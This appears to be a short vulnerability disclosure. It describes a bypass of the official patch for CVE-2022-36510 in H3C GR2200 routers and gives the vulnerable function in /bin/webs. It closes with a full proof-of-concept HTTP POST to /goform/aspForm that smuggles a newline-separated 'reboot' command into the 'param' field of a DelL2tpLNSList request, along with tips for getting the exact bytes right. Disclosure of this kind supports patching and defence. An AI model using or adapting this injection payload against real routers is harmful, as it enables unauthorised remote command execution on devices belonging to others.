This is a method to bypass the offical patch for CVE-2022-36510

Vulnerability introduction

H3C GR2200 was discovered a fatal vulnerabilities that can cause a remote code execution(RCE) via the aspForm parame

Official website : https://www.h3c.com/

Download link: H3C MiniGR1A0V100R016 版本软件及说明书-新华三集团-H3C

H3C MiniGR1A0V100R016 is the latest version on GR2200

Vulnerability analysis

DelL2tpLNSList parameter in the function sub_46EAC8

In the binary file /bin/webs , we use IDA to locate the function sub_46EAC8 that causes the vulnerability.

As you can see, the snprintf function is called on line 36 of the sub_46EAC8 function. Let’s trace the source of the parameter

We found that the value of v14 and v15 is determined by parameter , we can bypass the check_function sub_46EE10(CVE-2022-36510 offical patch) by using the character ‘0a’ like this

The image shows the router rebooting after the reboot command is executed

The POC is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /goform/aspForm HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://182.203.77.121:8989
Connection: close
Referer: http://182.203.77.121:8989/vpn_l2tp_lac.asp
Cookie: JSESSIONID=0053a41c
Upgrade-Insecure-Requests: 1
Priority: u=4

CMD=DelL2tpLNSList&param=1; 
reboot;

Note that when copying this POC, there will be an additional 0d byte after ‘param=1;’, and all you need to do is delete this byte